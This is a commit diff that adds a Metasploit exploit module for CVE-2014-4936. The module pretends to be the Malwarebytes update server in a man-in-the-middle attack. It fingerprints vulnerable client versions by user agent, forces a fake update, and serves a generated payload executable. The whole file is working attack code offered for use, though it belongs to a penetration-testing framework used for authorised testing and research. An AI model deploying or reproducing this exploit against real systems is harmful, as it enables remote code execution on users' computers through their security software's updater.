Add module for CVE-2014-4936

2015-01-18 17:18:05 +01:00 · 2015-01-18 17:18:05 +01:00 · affc661524
parent ac4eb3bb90
commit affc661524
1 changed files with 104 additions and 0 deletions
--- a/modules/exploits/windows/browser/mbam_update_exec.rb
+++ b/modules/exploits/windows/browser/mbam_update_exec.rb
@ -0,0 +1,104 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution',
+      'Description'    => %q{
+          This module exploits a vulnerability in the update functionality of
+        Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes
+        Anti-Exploit consumer 1.03.1.1220.
+        Due to the lack of proper update package validation a man-in-the-middle
+        attacker could execute arbitrary code by spoofing the update server
+        data-cdn.mbamupdates.com and uploading an executable. This module has
+        been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Yonathan Klijnsma',  # Vulnerability discovery and PoC
+          'Gabor Seljan'        # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '32132' ],
+          [ 'OSVDB', '103910' ],
+          [ 'CVE', '2014-4936' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'SRVPORT' => 80
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows Universal', {} ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Dec 16 2014',
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('URIPATH', [ true, 'The URI to use (do not change)', '/' ])
+      ], self.class)
+  end
+
+  def on_request_uri(cli, request)
+
+    ua = request['User-Agent']
+    uri = request.uri
+
+    unless agent = ua ? ua[/^(\w{4})/, 1] : uri[/^\/v2\/(\w{4})/, 1]
+      print_error("User agent cannot be identified")
+      send_response(cli, '')
+      return
+    end
+
+    unless agent =~ /^mba(m|e)/
+      print_error("Unknown user agent connected")
+      send_response(cli, '')
+      return
+    end
+
+    case uri
+    when "/v2/#{agent}/consumer/version.chk"
+      print_status("#{agent.upcase} connected")
+
+      unless ua
+        print_status("Client may not be vulnerable")
+      end
+
+      if ua && (ver = ua[/base:(\d+\.\d+\.\d+\.\d+)/,1]) &&
+         Gem::Version.new(ver) >= Gem::Version.new('2.0.3')
+        print_error("Client version #{ver} is not vulnerable")
+        send_response(cli, '')
+        return
+      end
+
+      print_status("Enforcing update to version 9.99.9.9999")
+      send_response(cli, '9.99.9.9999', {
+        'Content-Type' => 'application/octet-stream'
+      })
+    when "/v2/#{agent}/consumer/data/#{agent}-setup-9.99.9.9999.exe"
+      print_status("Sending payload EXE...")
+      send_response(cli, generate_payload_exe, {
+        'Content-Type' => 'application/x-msdos-program'
+      })
+    else
+      send_response(cli, '')
+    end
+
+  end
+end